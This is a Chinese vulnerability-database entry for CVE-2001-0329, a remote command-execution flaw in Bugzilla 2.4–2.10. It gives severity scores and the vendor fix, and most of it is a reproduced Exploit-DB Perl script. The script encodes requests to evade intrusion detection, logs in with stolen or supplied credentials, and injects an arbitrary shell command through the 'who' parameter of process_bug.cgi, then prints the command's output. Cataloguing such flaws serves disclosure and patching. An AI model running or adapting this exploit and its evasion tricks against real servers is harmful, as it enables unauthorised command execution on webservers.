CVE-2001-0329 发布时间 :2001-06-27 00:00:00
修订时间 :2008-09-10 15:07:46
N M C O E
[原文] Bugzilla 2.10 allows remote attackers to execute arbitrary commands via shell metacharacters in a username that is then processed by (1) the Bugzilla_login cookie in post_bug.cgi, or (2) the who parameter in process_bug.cgi.
[CNNVD] Bugzilla远程执行任意命令漏洞 (CNNVD-200106-140 )
Bugzilla 2.10版本存在漏洞。远程攻击者可以借助用户名中的shell元字符执行任意命令,这些命令由(1)post_bug.cgi中的Bugzilla_login cookie或(2)process_bug.cgi中的who参数处理。
-
CVSS (基础分值)
CVSS分值:
7.5
[严重(HIGH)]
机密性影响:
PARTIAL
[很可能造成信息泄露]
完整性影响:
PARTIAL
[可能会导致系统文件被修改]
可用性影响:
PARTIAL
[可能会导致性能下降或中断资源访问]
攻击复杂度:
LOW
[漏洞利用没有访问限制 ]
攻击向量:
[--]
身份认证:
NONE
[漏洞利用无需身份认证]
-
CPE (受影响的平台与产品)
cpe:/a:mozilla:bugzilla:2.8 Mozilla Bugzilla 2.8 cpe:/a:mozilla:bugzilla:2.10 Mozilla Bugzilla 2.10 cpe:/a:mozilla:bugzilla:2.4 Mozilla Bugzilla 2.4 cpe:/a:mozilla:bugzilla:2.6 Mozilla Bugzilla 2.6
-
OVAL (用于检测的技术细节)
-
官方数据库链接
-
其它链接及资源
-
漏洞信息
漏洞名称: Bugzilla远程执行任意命令漏洞
紧急程度: 高危漏洞类型: 输入验证
发布日期: 2001-06-27 00:00:00更新日期: 2005-10-20 00:00:00
攻击路径: 远程
详细介绍:
Bugzilla 2.10版本存在漏洞。远程攻击者可以借助用户名中的shell元字符执行任意命令,这些命令由(1)post_bug.cgi中的Bugzilla_login cookie或(2)process_bug.cgi中的who参数处理。
-
公告与补丁
The vendor has addressed this issue in Bugzilla versions 2.12 and later.
-
漏洞信息 (19909)
漏洞名称: Mozilla Bugzilla 2.4/2.6/2.8/2.10 Remote Arbitrary Command Execution (EDBID:19909)
影响平台: cgi漏洞类型: remote
发布日期: 2000-05-11确认状态: Verified
漏洞端口: 0代码作者: Frank van Vliet karin
系统下载:
N/A 代码下载:
[点击下载]
source: http://www.securityfocus.com/bid/1199/info
Bugzilla is a web-based bug-tracking system based on Perl and MySQL. It allows people to submit bugs and catalogs them.
Bugzilla is prone to a vulnerability which may allow remote users to execute arbitrary commands on the target webserver.
When accepting a bug report, the script "process_bug.cgi" calls "./processmail" via a perl system() call argumented by a number of paramaters with values originating from user input via a web-form. There are no checks against these values for shell metacharacters by the script before insertion into the system() call.
As a result, it possible for an attacker to supply maliciously crafted input to form fields, which when submitted will cause arbitrary commands to be executed on the shell of the host running vulnerable versions of Bugzilla. Commands will be executed with the privileges of the webserver process.
#!/usr/bin/perl
# Bugzilla 2.8 remote exploit
# by {} - karin@root66.nl.eu.org
# RooT66 - http://root66.nl.eu.org
# ShellOracle - http://www.shelloracle.cjb.net
# b0f - http://b0f.freebsd.lublin.pl
#
# This exploits uses antiIDS tricks ripped from whisker
# next 2 functinos stolen from whisker, commented by me
sub rstr { # no, this is not a cryptographically-robust number generator
my $str,$c;
$drift=(rand() * 10) % 10;
for($c=0;$c<10+$drift;$c++){
$str .= chr(((rand() * 26) % 26) + 97);} # yes, we only use a-z
return $str;}
sub antiIDS {
($url) = (@_);
$url =~s/([-a-zA-Z0-9.\<\>\\\|\'\`])/sprintf("%%%x",ord($1))/ge;
$url =~ s/\ /+/g;
$url =~s/\//\/.\//g;
return $url;
}
#end of stolen stuff
($complete_url, $Bugzilla_login, $Bugzilla_password, $command) = (@ARGV);
print("Exploit for Bugzilla up to version 2.8\n");
print(" by {} - karin\@root66.nl.eu.org\n");
print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n");
print("RooT66 - http://root66.nl.eu.org\n");
print("ShellOracle - http://www.shelloracle.cjb.net\n");
print("b0f - http://b0f.freebsd.lublin.pl\n");
print("\n");
if ($complete_url eq "-h" || $complete_url eq "--help") {
print("Usage: $0 url emailaddress password command\n");
exit;
}
# Get information of user
if (!$complete_url) {
print("URL: ");
$complete_url = <STDIN>; chomp($complete_url); $complete_url =~ s/http:\/\///;
}
if (!$Bugzilla_login) {
print("EMAIL: ");
$Bugzilla_login = <STDIN>; chomp($Bugzilla_login);
}
if (!$Bugzilla_password) {
print("PASSWORD: ");
$Bugzilla_password = <STDIN>; chomp($Bugzilla_password);
}
if (!$command) {
print("COMMAND: ");
$command = <STDIN>; chomp($command);
}
# Set some variables
$host = $complete_url; $host =~ s/\/.*//;
$base_dir = $complete_url; $base_dir =~ s/^$host//; $base_dir =~ s/[a-zA-Z.]*$//;
# Make own directory
system("mkdir $$");
print("Getting information needed to submit our 'bug'\n");
# Get product name
system("cd $$; lynx -source \"http://$host/" . antiIDS("$base_dir/enter_bug.cgi") . "?Bugzilla_login=" . antiIDS("$Bugzilla_login") . "&Bugzilla_password=" . antiIDS("$Bugzilla_password") . "\" > enter_bug.cgi");
open(FILE, "< $$/enter_bug.cgi");
while($input = <FILE>) {
if ($input =~ /enter_bug.cgi\?product=/) {
chomp($input);
$product = $input;
$product =~ s/.*product=//;
$product =~ s/".*//;
if ($product =~ /\&component=/) {
$component = $product;
$product =~ s/&.*//; # strip component
$component =~ s/.*component=//;
$component =~ s/".*//;
}
}
}
print("\tProduct: $product\n");
if ($component) {
print("\tComponent: $component\n");
}
# Get more information
$page = antiIDS("$base_dir/enter_bug.cgi?") . "product=" . antiIDS("$product") . "&Bugzilla_login=" . antiIDS("$Bugzilla_login") . "&Bugzilla_password=" . antiIDS("$Bugzilla_password");
system("cd $$; lynx -dump \"http://$host/$page\" > enter_bug.cgi");
open(FILE, "< $$/enter_bug.cgi");
while($input = <FILE>) {
chomp($input);
if ($input =~ /Reporter:/) {
$reporter = $input;
$reporter =~ s/.*Reporter: //;
$reporter =~ s/\ .*//;
}
if ($input =~ /Version:/) {
$version = $input;
$version =~ s/.*Version: \[//;
$version =~ s/\.*\].*//;
}
if ($input =~ /Component:/) {
$component = $input;
$component =~ s/.*Component: \[//;
$component =~ s/\.*\].*//;
}
if ($input =~ /Platform:/) {
$platform = $input;
$platform =~ s/.*Platform: \[//;
$platform =~ s/\.*\].*//;
}
if ($input =~ /OS:/) {
$os = $input;
$os =~ s/.*OS: \[//;
$os =~ s/\.*\].*//;
}
if ($input =~ /Priority:/) {
$priority = $input;
$priority =~ s/.*Priority: \[//;
$priority =~ s/\].*//;
}
if ($input =~ /Severity:/) {
$severity = $input;
$severity =~ s/.*Severity: \[//;
$severity =~ s/\.*\].*//;
}
}
print("\tReporter: $reporter\n");
print("\tVersion: $version\n");
print("\tComponent: $component\n");
print("\tPlatform: $platform\n");
print("\tOS: $os\n");
print("\tPriority: $priority\n");
print("\tSeverity: $severity\n");
close(FILE);
#liftoff
print("Sending evil bug report\n");
$page = antiIDS("$base_dir/process_bug.cgi") . "?bug_status=" . antiIDS("NEW") . "&reporter=" . antiIDS($reporter) . "&product=" . antiIDS("$product") . "&version=" . antiIDS("$version") . "&component=" . antiIDS("$component") . "&rep_platform=" . antiIDS("$platform") . "&op_sys=" . antiIDS($os) . "&priority=" . antiIDS($priority) . "&bug_severity=" . antiIDS($severity) . "&who=". antiIDS("blaat\@blaat.com;echo \\<pre\\>START OUTPUT COMMAND;$command;echo \\<\\/pre\\>END OUTPUT COMMAND;") . "&knob=" . antiIDS("duplicate") . "&dup_id=" . antiIDS("202021234123412341234") . "&Bugzilla_login=" . antiIDS($Bugzilla_login) . "&Bugzilla_password=" . antiIDS($Bugzilla_password) . "&assigned_to=&cc=&bug_file_loc=&short_desc=&comment=&form_name=enter_bug";
system("cd $$; lynx -dump \"$host/$page\" > enter_bug.cgi");
open(FILE, "< $$/enter_bug.cgi");
while($input = <FILE>) {
chomp($input);
if ($input =~ /END OUTPUT COMMAND/) {
$startoutput = 0;
}
if ($startoutput) {
print("$input\n");
}
if ($input =~ /START OUTPUT COMMAND/) {
$startoutput = 1;
}
}
close(FILE);
# Delete shit
# system("rm -rf $$");
-
漏洞信息
OSVDBID:
6364
漏洞名称: Bugzilla post_bug.cgi Bugzilla_login Cookie Arbitrary Command Execution
漏洞位置:
利用方式:
漏洞影响: 解决方式:
漏洞利用: 公开方式:
-
漏洞描述
-
时间线
公开日期:
2000-05-11发现日期:
Unknow
利用日期: Unknow解决日期: Unknow
-
解决方案
-
相关参考
-
漏洞作者
人生不是一种享乐,而是一桩十分沉重的工作。